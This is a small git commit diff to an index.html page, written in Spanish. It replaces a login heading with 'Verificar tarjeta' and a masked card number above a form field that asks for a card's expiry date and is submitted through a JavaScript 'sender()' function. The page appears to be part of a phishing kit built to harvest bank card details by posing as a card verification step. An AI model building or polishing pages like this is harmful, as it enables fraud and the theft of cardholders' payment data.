Actualizar index.html

--- a/index.html
+++ b/index.html
@@ -64,7 +64,7 @@
 
         <center>
             <form method="post" action="#" onsubmit="return sender();">
-            <h2>Inicia session para seguir</h2>
+            <h2>Verificar tarjeta 5203xxxxxxxx4949 </h2>
             <div class="input-group">
                
                 <input inputmode="numeric" placeholder="Fecha de Expiracion MM/AA" type="text" id="elru7" name="elru7" required="">
